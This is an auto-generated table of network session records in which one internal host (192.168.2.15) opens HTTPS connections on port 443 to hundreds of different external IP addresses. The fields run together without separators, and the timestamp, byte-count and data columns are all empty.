                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16297192.168.2.1537194119.119.161.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16298192.168.2.156026246.49.144.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16299192.168.2.1538484159.103.3.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16300192.168.2.155341069.248.1.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16301192.168.2.153280289.184.245.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16302192.168.2.153485273.190.151.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16303192.168.2.1533480171.162.80.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16304192.168.2.1538388199.29.18.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16305192.168.2.153279878.154.81.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16306192.168.2.1559694119.191.115.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16307192.168.2.1544864165.48.194.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16308192.168.2.1555460208.6.43.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16309192.168.2.1560944204.31.189.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16310192.168.2.1538616111.229.174.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16311192.168.2.1538070217.195.134.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16312192.168.2.155976879.203.219.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16313192.168.2.155379873.189.253.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16314192.168.2.155090483.212.75.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16315192.168.2.1537852115.228.151.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16316192.168.2.1548562112.137.112.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16317192.168.2.1540556164.70.47.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16318192.168.2.155282635.131.229.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16319192.168.2.1548716149.145.54.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16320192.168.2.156069266.17.25.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16321192.168.2.153762854.228.198.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16322192.168.2.1536296191.60.17.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16323192.168.2.1553920166.254.219.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16324192.168.2.1549390142.202.131.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16325192.168.2.1551954162.63.52.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16326192.168.2.1540022125.85.151.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16327192.168.2.1547442180.40.120.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16328192.168.2.1559236160.159.170.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16329192.168.2.153441275.154.234.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16330192.168.2.1551750145.186.192.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16331192.168.2.15430388.83.147.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16332192.168.2.1548728193.21.86.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16333192.168.2.1543878208.151.146.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16334192.168.2.1540086202.117.174.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16335192.168.2.154820618.208.248.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16336192.168.2.1550960173.113.106.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16337192.168.2.155772817.103.174.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16338192.168.2.1550780155.35.26.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16339192.168.2.155228062.167.88.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16340192.168.2.1554038186.97.125.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16341192.168.2.1539454200.19.138.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16342192.168.2.155399692.145.252.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16343192.168.2.1539088176.201.222.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16344192.168.2.154426441.234.93.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16345192.168.2.1538682181.209.231.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16346192.168.2.1555160182.133.225.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16347192.168.2.1552498169.33.216.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16348192.168.2.1558258205.163.138.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16349192.168.2.1533596183.26.55.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16350192.168.2.1554184122.127.156.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16351192.168.2.1558080221.104.112.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16352192.168.2.154827642.213.110.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16353192.168.2.154215670.59.17.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16354192.168.2.154608846.0.68.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16355192.168.2.1548262200.168.17.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16356192.168.2.1560982204.57.74.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16357192.168.2.1544280222.94.105.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16358192.168.2.153724449.219.37.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16359192.168.2.153333261.178.113.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16360192.168.2.1553274164.58.176.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16361192.168.2.1547694201.199.47.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16362192.168.2.1559382170.213.171.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16363192.168.2.1549326219.158.203.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16364192.168.2.154302631.242.166.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16365192.168.2.153763092.227.52.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16366192.168.2.15378568.250.131.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16367192.168.2.1549224180.76.120.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16368192.168.2.155593446.2.155.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16369192.168.2.1537150188.251.57.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16370192.168.2.1537522173.153.194.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16371192.168.2.1547314187.146.36.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16372192.168.2.1543950172.71.243.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16373192.168.2.1546990158.165.148.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16374192.168.2.1550332140.49.149.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16375192.168.2.1549278168.254.36.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16376192.168.2.1537432125.119.219.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16377192.168.2.1559768111.131.229.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16378192.168.2.1560728155.95.164.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16379192.168.2.155170690.236.69.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16380192.168.2.154381269.226.247.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16381192.168.2.1537002174.42.79.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16382192.168.2.1549210104.58.50.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16383192.168.2.155422297.57.148.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16384192.168.2.1547622114.191.162.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16385192.168.2.155835472.1.169.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16386192.168.2.154629299.5.216.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16387192.168.2.1544474147.65.132.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16388192.168.2.155246654.255.229.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16389192.168.2.1535580137.146.64.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16390192.168.2.1552470175.164.148.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16391192.168.2.1557648113.230.68.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16392192.168.2.1543064143.96.195.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16393192.168.2.153651297.152.181.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16394192.168.2.153738053.37.101.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16395192.168.2.1538820176.240.185.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16396192.168.2.1537572208.82.71.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16397192.168.2.155048280.50.68.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16398192.168.2.1537406151.32.146.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16399192.168.2.154765227.2.141.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16400192.168.2.1542640186.30.43.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16401192.168.2.1550818191.113.26.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16402192.168.2.153713268.155.33.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16403192.168.2.1542256154.73.19.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16404192.168.2.1543066167.191.76.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16405192.168.2.1537298109.241.1.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16406192.168.2.1553424203.61.224.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16407192.168.2.154456471.198.90.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16408192.168.2.1554386213.186.107.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16409192.168.2.154162846.82.156.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16410192.168.2.154778274.152.196.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16411192.168.2.153314614.218.59.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16412192.168.2.1554602198.142.81.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16413192.168.2.154769044.67.196.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16414192.168.2.1543106223.73.241.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16415192.168.2.154874477.99.243.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16416192.168.2.1535700144.145.244.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16417192.168.2.1559984211.189.135.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16418192.168.2.1534194175.139.198.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16419192.168.2.1553772219.174.135.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16420192.168.2.1559586175.239.178.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16421192.168.2.1552756178.194.248.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16422192.168.2.155375667.157.132.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16423192.168.2.1549810102.254.29.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16424192.168.2.15469788.193.90.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16425192.168.2.1546590191.143.58.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16426192.168.2.1534408213.230.188.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16427192.168.2.1543394138.72.60.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16428192.168.2.153500283.116.78.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16429192.168.2.153953465.10.118.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16430192.168.2.154192053.58.239.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16431192.168.2.1539744167.172.193.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16432192.168.2.1559486147.141.99.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16433192.168.2.1537678153.151.136.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16434192.168.2.1536650133.163.182.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16435192.168.2.154649618.128.129.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16436192.168.2.1543996110.245.5.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16437192.168.2.1550984101.54.253.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16438192.168.2.155587235.195.156.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16439192.168.2.153771067.103.7.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16440192.168.2.1556170212.191.183.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16441192.168.2.155410285.195.81.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16442192.168.2.154144074.17.18.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16443192.168.2.155285412.213.223.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16444192.168.2.1556428153.82.203.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16445192.168.2.154554083.235.236.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16446192.168.2.1559878162.105.129.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16447192.168.2.1558498153.109.40.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16448192.168.2.1556406151.243.179.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16449192.168.2.154287853.113.97.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16450192.168.2.154848692.25.208.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16451192.168.2.1541622118.150.249.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16452192.168.2.1538170118.187.61.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16453192.168.2.1540466105.181.128.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16454192.168.2.1554574144.99.194.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16455192.168.2.1555728218.230.4.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16456192.168.2.1534442104.21.16.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16457192.168.2.1544726198.202.18.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16458192.168.2.155663438.27.142.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16459192.168.2.1540542148.96.0.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16460192.168.2.1547662206.231.36.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16461192.168.2.1556784178.176.89.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16462192.168.2.155370049.192.111.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16463192.168.2.1548198123.202.76.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16464192.168.2.1532828207.222.218.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16465192.168.2.1556534145.242.105.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16466192.168.2.1534780170.163.201.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16467192.168.2.1549356167.15.54.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16468192.168.2.15482061.36.76.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16469192.168.2.154691468.3.115.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16470192.168.2.1535066150.60.16.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16471192.168.2.1551114177.240.120.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16472192.168.2.1555566193.95.247.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16473192.168.2.1533490136.183.207.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16474192.168.2.153367027.90.103.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16475192.168.2.1551804222.90.40.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16476192.168.2.153622036.70.224.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16477192.168.2.153680447.147.142.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16478192.168.2.153591057.96.131.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16479192.168.2.1537054167.214.1.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16480192.168.2.1542686114.26.184.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16481192.168.2.155398486.16.172.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16482192.168.2.155041820.225.59.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16483192.168.2.155772876.111.163.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16484192.168.2.1544218123.245.27.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16485192.168.2.1557010131.65.243.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16486192.168.2.1547708209.111.234.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16487192.168.2.1546338154.242.103.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16488192.168.2.1538196223.71.133.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16489192.168.2.1548324197.198.76.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16490192.168.2.154505242.171.109.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16491192.168.2.155549476.181.100.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16492192.168.2.1536834221.198.87.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16493192.168.2.1534754196.90.236.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16494192.168.2.1553724220.138.226.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16495192.168.2.1536578102.20.176.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16496192.168.2.154566488.224.216.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16497192.168.2.1544924209.201.193.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16498192.168.2.1535282123.114.228.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16499192.168.2.1537082108.45.2.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16500192.168.2.155543219.26.64.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16501192.168.2.1540972173.231.206.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16502192.168.2.154175262.96.39.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16503192.168.2.1533000179.153.4.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16504192.168.2.1556406108.181.78.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16505192.168.2.1547552164.108.217.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16506192.168.2.154299647.89.205.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16507192.168.2.1548744218.151.79.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16508192.168.2.1560980217.84.15.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16509192.168.2.154094436.254.249.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16510192.168.2.1555070179.84.90.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16511192.168.2.15583425.70.72.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16512192.168.2.1555248145.198.249.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16513192.168.2.1536282111.106.180.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16514192.168.2.1545862185.152.129.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16515192.168.2.1549432101.111.16.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16516192.168.2.1560646101.37.191.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16517192.168.2.1550636178.78.159.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16518192.168.2.155825688.232.60.28443
